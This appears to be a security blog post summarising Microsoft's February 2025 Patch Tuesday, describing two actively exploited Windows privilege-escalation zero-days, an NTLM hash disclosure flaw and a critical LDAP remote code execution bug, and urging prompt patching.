Microsoft fixed 63 flaws this Patch Tuesday, including four zero-day vulnerabilities where two were actively exploited. These security updates are further divided into 3 Critical, 57 Important, 1 Moderate, and 2 Low Vulnerabilities. Remote code execution vulnerabilities dominated the current threat landscape, followed by the Elevation of Privilege and then denial of service, posing a significant threat to data integrity and system security.
Two notable actively exploited flaws -
CVE-2025-21391 – Windows Storage Elevation of Privilege Vulnerability: CVSS score: 7.1 (AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H/E:F/RL:O/RC:C)
CVE-2025-21418 - Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability: CVSS: 7.8 (AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:F/RL:O/RC:C)
CVE-2025-21391 – Windows Storage Elevation of Privilege Vulnerability:
Microsoft fixed an actively exploited EoP vulnerability that can be used to delete files. According to Microsoft advisory, “This vulnerability does not allow disclosure of any confidential information, but could allow an attacker to delete data that could include data that results in the service being unavailable.” Information about the disclosure or how this flaw was exploited in attacks is currently unavailable publicly, but Microsoft has detected active exploitation.
CVE-2025-21418 – Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability:
This zero-day CVE-2025-21418 is a privilege escalation vulnerability in the Windows Ancillary Function Driver for WinSock (AFD.sys) that could be exploited to gain SYSTEM privileges. A similar flaw in the same component (CVE-2024-38193) was disclosed by Gen Digital last August ’24 as being weaponized by the North Korea-linked Lazarus Group. Still, it’s currently unknown whether the abuse of CVE-2025-21418 is also linked to the Lazarus Group.
CISA has added both these vulnerabilities to its KEV, and federal agencies are required to apply patches before 04 March ’25.
CVE-2025-21377 – NTLM Hash Disclosure Spoofing Vulnerability:
This vulnerability disclosed a significant threat by exposing the user’s NTLMv2 hashes to the attacker, potentially leading to unauthorized network access. This vulnerability allows the external input to manipulate file paths without proper validation, enabling an attacker to trick the system into sending the NTLMv2 hash over the network. Once intercepted, this hash can potentially be leveraged to authenticate and impersonate the victim.
CVE-2025-21376 – Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability:
This is a critical RCE vulnerability affecting Windows LDAP (Lightweight Directory Access Protocol) service. According to Microsoft, “an unauthenticated attacker could send a specially crafted request to a vulnerable LDAP server. Successful exploitation requires an attacker to win a race condition and could result in a buffer overflow which could be leveraged to achieve remote code execution.”
Microsoft’s Feb’25 Patch Tuesday may be smaller in scale than January’s security updates, but it delivers crucial security fixes that require urgent engagement. With two actively exploited vulnerabilities and multiple critical updates, organizations must act swiftly to apply these patches and strengthen their security posture. Delaying security patches increases the risk of exploitation. By prioritizing timely updates and implementing proactive security measures, businesses can mitigate risks and safeguard their systems against evolving cyber threats.
